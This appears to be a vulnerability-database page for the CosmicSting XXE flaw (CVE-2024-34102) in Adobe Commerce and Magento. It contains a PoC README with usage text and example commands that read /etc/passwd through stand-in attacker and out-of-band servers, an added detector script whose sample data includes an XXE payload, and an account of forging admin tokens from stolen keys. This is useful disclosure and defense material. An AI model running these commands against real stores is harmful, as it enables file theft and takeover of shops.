
CVE-2024-34102 PoC: Adobe Commerce code issue vulnerability

Source
Related vulnerability
Title: Adobe Commerce code issue vulnerability (CVE-2024-34102)
Description: Adobe Commerce is a leading global digital commerce solution for merchants and brands from Adobe, a US company. Adobe Commerce contains a code issue vulnerability that stems from an improper restriction of XML External Entity (XXE) references and may lead to arbitrary code execution.
Description
CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)
Introduction
# CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)

CVE-2024-34102 is a severe security flaw arising from improper handling of nested deserialization in Adobe Commerce and Magento. This vulnerability permits attackers to exploit XML External Entities (XXE) during the deserialization process, potentially allowing remote code execution. In short, attackers can craft malicious JSON payloads that, when deserialized by the application, instantiate objects with unintended properties or behaviors. This could lead to various security risks.

Exploiting this vulnerability allows attackers to gain unauthorized administrative access to the REST, GraphQL, or SOAP API, potentially leading to data theft, service disruption, and complete compromise of affected systems. The vulnerability poses a significant risk because it can exfiltrate sensitive files such as app/etc/env.php, which contains the cryptographic keys used for authentication. With those keys, attackers can forge administrator tokens and manipulate Magento's APIs as privileged users.

Moreover, CVE-2024-34102 can be chained with other vulnerabilities, such as the PHP filter chains exploit (CVE-2024-2961), leading to remote code execution (RCE). The broader implications of XML External Entity (XXE) vulnerabilities enable attackers to retrieve and manipulate data from external sources, exacerbating the potential impact on compromised systems.
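The paragraphs above describe the defender-relevant shape of the attack: an XML document carrying entity declarations arrives wrapped inside JSON string values that the application later deserializes. The following is an added triage helper, not code from the PoC repository or from Adobe, that walks each JSON request body recursively and flags string values containing DOCTYPE or ENTITY declarations or SYSTEM/PUBLIC external identifiers. The sample request records are constructed for the example; in practice the bodies would come from access logs, a WAF, or a reverse proxy capture.

```python
import json
import re
from typing import Any, Iterator, List, Tuple

# Constructed sample request records (not real traffic). Each "body" is a JSON
# document as it might be posted to an API endpoint that deserializes user input.
SAMPLE_REQUESTS = [
    {"id": 1, "body": '{"customer": {"email": "a@example.test", "firstname": "A"}}'},
    {"id": 2, "body": '{"data": {"note": "<?xml version=\\"1.0\\"?>'
                      '<!DOCTYPE r [<!ENTITY x SYSTEM \\"file:///etc/passwd\\">]><r>&x;</r>"}}'},
    {"id": 3, "body": '{"items": [{"sku": "abc", "desc": "plain <b>html</b> text"}]}'},
    {"id": 4, "body": 'not json at all'},
]

# Indicators that an XML document with entity declarations or external references
# has been smuggled into a field where the API expects a plain JSON scalar.
XXE_PATTERNS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("doctype", re.compile(r"<!DOCTYPE", re.IGNORECASE)),
    ("entity", re.compile(r"<!ENTITY", re.IGNORECASE)),
    ("system_id", re.compile(r"\bSYSTEM\s+[\"']", re.IGNORECASE)),
    ("public_id", re.compile(r"\bPUBLIC\s+[\"']", re.IGNORECASE)),
]


def iter_strings(node: Any) -> Iterator[str]:
    """Yield every string value reachable in a parsed JSON structure, at any depth."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from iter_strings(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_strings(value)


def find_xxe_indicators(body: str) -> List[str]:
    """Return the names of XXE indicators found in any string inside the JSON body.

    Bodies that fail to parse as JSON are scanned as raw text, so a request cannot
    evade the check simply by being malformed.
    """
    try:
        strings = list(iter_strings(json.loads(body)))
    except ValueError:
        strings = [body]
    hits: List[str] = []
    for text in strings:
        for name, pattern in XXE_PATTERNS:
            if name not in hits and pattern.search(text):
                hits.append(name)
    return hits


def scan_requests(requests) -> List[Tuple[int, List[str]]]:
    """Return (request id, indicator names) for every request carrying XXE markers."""
    flagged = []
    for request in requests:
        hits = find_xxe_indicators(request["body"])
        if hits:
            flagged.append((request["id"], hits))
    return flagged


if __name__ == "__main__":
    for request_id, indicators in scan_requests(SAMPLE_REQUESTS):
        print(f"request {request_id}: possible XXE payload, matched {indicators}")
```

Matching on the declaration keywords rather than on any particular exploit parameter keeps the check independent of how a given PoC names its JSON fields; the trade-off is that legitimate fields that genuinely carry XML with a DOCTYPE will need an allow-list. Run it over a day of API request bodies and any hit on an endpoint that should never receive XML is worth an immediate look, together with a check of whether app/etc/env.php keys have since been rotated.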

## Usage
```
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]

Exploit script for XXE vulnerability

options:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        Target URL (http(s)://ip[:port])
  --read-file READ_FILE, -r READ_FILE
                        File to read from the remote host
  --oob-server OOB_SERVER, -ob OOB_SERVER
                        OOB server URL (http(s)://ip[:port])
  --host-server HOST_SERVER, -hs HOST_SERVER
                        Host server URL (http(s)://ip[:port])
```

### Examples
```bash
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"

# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"

# Detection
python3 detect.py -t https://magento.test
```

## Disclaimer
This exploit script has been created solely for the purposes of research and for the development of effective defensive techniques. It is not intended to be used for any malicious or unauthorized activities. The author and the owner of the script disclaim any responsibility or liability for any misuse or damage caused by this software. Users are urged to use this software responsibly and only in accordance with applicable laws and regulations. Use responsibly.


File snapshot

```
[4.0K] /data/pocs/e87abe819bc4391dff7edcb477d902317e4598d7
├── [4.6K] detect.py
├── [4.5K] exploit.py
├── [1.0K] LICENSE
└── [2.9K] README.md

0 directories, 4 files
```